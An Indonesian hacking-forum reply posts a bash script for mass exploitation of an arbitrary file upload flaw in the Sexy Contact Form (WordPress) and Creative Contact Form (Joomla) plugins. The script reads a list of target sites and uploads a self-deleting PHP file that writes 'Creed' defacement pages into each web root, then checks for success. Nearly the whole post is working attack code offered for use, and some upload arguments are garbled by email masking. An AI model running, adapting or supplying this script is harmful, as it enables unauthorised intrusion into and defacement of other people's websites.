05-19-2015, 04:27 AM
(05-18-2015, 11:56 PM)flips Wrote: wihh makasih om shareannya
kalo boleh tau ini cara kerja exploitnya gmn ya ? oiya itu kan write cssnya kalo misalkan mau write file yang php gimana mas ?
coba yang ini om Contact Form
Code:
#!/bin/bash
#
#
read -p "List Target = " list
if [ ! -f $list ];then
echo " + List target tdk ada cuk.. "
exit
fi
FCK=$RANDOM
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -d log ];then
mkdir log
fi
if [ ! -f rr.php ];then
cat > rr.php <<_EOF
<?php \$file="<title>Creed</title><center><div id=q>Creed<br><font size=2>Creed <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}"; \$path = \$_SERVER["DOCUMENT_ROOT"]; \$r=fopen(\$path."/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/images/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/wp-content/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);echo md5("creed");unlink(__FILE__); ?>
_EOF
fi
CekDFC(){
czone=${2}
if [ -f tmp/${FCK}gck.txt ];then
rm -f tmp/${FCK}gck.txt
fi
if [ -f tmp/${FCK}hasil.txt ];then
rm -f tmp/${FCK}hasil.txt
fi
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "${1}" -o tmp/${FCK}gck.txt
if [ -f tmp/${FCK}gck.txt ];then
cat tmp/${FCK}gck.txt | grep -i "Creed" >/dev/null;gck=$?
if [ $gck -eq 0 ];then
echo " + File found $1"
if [ $czone -eq 1 ];then
echo "${1}" > tmp/${FCK}empes.txt
break
fi
fi
fi
}
CekDFC5(){
#echo " - check file $1"
curl --silent --max-time 10 --connect-timeout 10 "${1}" -o tmp/${FCK}w00t
cat tmp/${FCK}w00t | grep -i "38db7ce1861ee11b6a231c764662b68a" >/dev/null;cwot=$?
if [ $cwot -eq 0 ];then
echo " + Exploit Success"
CekDFC "http://${HOSTX}/nyet.htm" 1
CekDFC "http://${HOSTX}/wp-content/nyet.htm" 1
CekDFC "http://${HOSTX}/components/nyet.htm" 1
fi
}
SexyWP(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[][email protected]" \
--request POST "http://${HOSTX}/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"
CekDFC5 "http://${HOSTX}/wp-content/plugins/sexy-contact-form/includes/fileupload/files/rr.php"
}
SexyJM(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[][email protected]" \
--request POST "http://${HOSTX}/components/com_creativecontactform/fileupload/index.php"
CekDFC5 "http://${HOSTX}/components/com_creativecontactform/fileupload/files/rr.php"
}
VulnSexy(){
curl --silent --max-time 10 --connect-timeout 10 "http://${HOSTX}/index.php" -o tmp/${FCK}cvuln
if [ ! -f tmp/${FCK}cvuln ];then
rm -f tmp/${FCK}*
continue
fi
cat tmp/${FCK}cvuln | grep "wp-content" >/dev/null;csexy=$?
if [ $csexy -eq 0 ];then
echo " + Wordpress Detect"
SexyWP
else
echo " + Joomla Detect"
SexyJM
fi
}
for HOSTX in `cat $list`
do
VulnSexy
done